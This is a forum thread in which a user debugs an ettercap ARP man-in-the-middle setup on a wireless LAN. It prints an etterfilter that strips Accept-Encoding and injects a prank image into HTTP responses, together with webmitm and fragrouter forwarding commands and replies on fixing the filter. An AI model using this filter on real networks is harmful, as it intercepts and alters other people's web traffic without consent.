Results 1 to 7 of 7

Thread: Problem when using ettercap filters to alter traffic

  1. #1
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    5

    Default Problem when using ettercap filters to alter traffic

    Hi all!

    I am currently trying to alter http traffic with ettercap. I am connected to a wireless lan.

    On a shell i configure ip forwarding in two shells with
    Code:
    webmitm -i wlan0
    fragrouter -i wlan0 -B1
    No errors.

    Afterwards I start ettercap, start unified sniffing, scan for hosts, launch mitm attack and start sniffin'. I browse the net on another PC and I can see that the traffic gets redirected on the two shells. Internet works. I did not forget to remove the two wildcards in etter.conf file in front of iptables

    I then try to use Irongeek's filter:

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
    	  # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
       msg("Filter Ran.\n");
    }
    Ettercap says that the filter was applied (the window outputs "Filter Ran" and "zapped Accept-Encoding") but changes do not apply when I browse on my other PC.

    When I checked on wireshark, I did see an alteration made (the "rubbis" alteration) but the packets were described as TCP out-of-order. But I didn't see the "img" alteration, in fact I didn't see any server response in Wireshark.
    I also tried using the burp proxy suite with transproxy, but I could only intercept request, and not server responses. How come?

    This is driving me crazy, I searched and searched for an answer, nothing seems to work.

    Any ideas? Many thanks for helping me
    Last edited by albanderuaz; 06-17-2010 at 09:29 PM. Reason: added details

  2. #2
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: Problem when using ettercap filters to alter traffic

    Quote Originally Posted by albanderuaz View Post
    On a shell i configure ip forwarding
    Quote Originally Posted by albanderuaz View Post
    I did not forget to remove the two wildcards in etter.conf file in front of iptables
    If your manually configuring ip forwarding, or in your case using webmitm and fragrouter, Why would you remove the comments in etter.conf? You dont want ettercap to control forwarding right?
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  3. #3
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Problem when using ettercap filters to alter traffic

    I don't think you can use an exclamation mark in an HTTP header.

    While "Rubbish!" is technically the same length as "Encoding" I think it would end up being ignored.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default Re: Problem when using ettercap filters to alter traffic

    Quote Originally Posted by thorin View Post
    I don't think you can use an exclamation mark in an HTTP header.

    While "Rubbish!" is technically the same length as "Encoding" I think it would end up being ignored.
    Actually that's the general idea I believe.

    I agree with killa BUT, why use fragrouter etc. when ettercap is more than capable of doing it all for you. It could be that fragrouter is passing the packets through well before ettercap is finished with them and then the out-of-order stuff is being ignored at the client end. Remember to KISS when you're putting these attack vectors together.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    Junior Member
    Join Date
    Mar 2009
    Posts
    77

    Default Re: Problem when using ettercap filters to alter traffic

    I also tryed to ran the etterfilter from irongeek and had the same issues like you!
    In my case the error was the replace statements in the filter.

    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    # note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
    }
    }
    if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src='http://www.irongeek.com/images/jollypwn.png' ");
    replace("IMG SRC=", "img src='http://www.irongeek.com/images/jollypwn.png' ");
    msg("Filter Ran.\n");
    }
    the differenz is in the image URL. I've changed the " to ' and forme it worked!
    Try it!

  6. #6
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    5

    Default Re: Problem when using ettercap filters to alter traffic

    First of all, thank you for your answers. In fact when I used ettercap to handle ip forwarding, the "filter ran" and "zapped..." never appeared on the ettercap window. That is why I tried using both. What do youbthink is better: using ettercap to ip forward or using fragrouter and webmitm?

    edit: Allright I did other tests:
    -running ettercap and letting him manage ip forwarding (removed wildcards)
    -running webmitm and fragrouter for ip forwarding

    Ettercap still does not filter anything: 'Rubbish' packets are marked as TCP out-of-order and I can't see incoming packets on wireshark, although ettercap reports that the 'img' alteration has been done.

    Thank you very much for your help!
    Last edited by albanderuaz; 06-19-2010 at 10:32 AM.

  7. #7
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Problem when using ettercap filters to alter traffic

    Quote Originally Posted by Gitsnik View Post
    Actually that's the general idea I believe.

    I agree with killa BUT, why use fragrouter etc. when ettercap is more than capable of doing it all for you. It could be that fragrouter is passing the packets through well before ettercap is finished with them and then the out-of-order stuff is being ignored at the client end. Remember to KISS when you're putting these attack vectors together.
    I guess I wasn't clear. I think you can substitute a same length word, the problem I believe is that the word the OP used contained an exclamation point.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Similar Threads

  1. Some answers about ettercap filters ! :)
    By slxhw in forum OLD Newbie Area
    Replies: 5
    Last Post: 03-28-2009, 08:13 AM
  2. Problems with ettercap filters
    By compaq in forum OLD Newbie Area
    Replies: 2
    Last Post: 06-07-2008, 08:35 PM
  3. ettercap filters
    By unlazyfree in forum OLD BackTrack v2.0 Final
    Replies: 16
    Last Post: 03-30-2008, 12:44 PM
  4. Ettercap Filters
    By Mortifix in forum OLD Newbie Area
    Replies: 13
    Last Post: 12-03-2007, 10:51 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •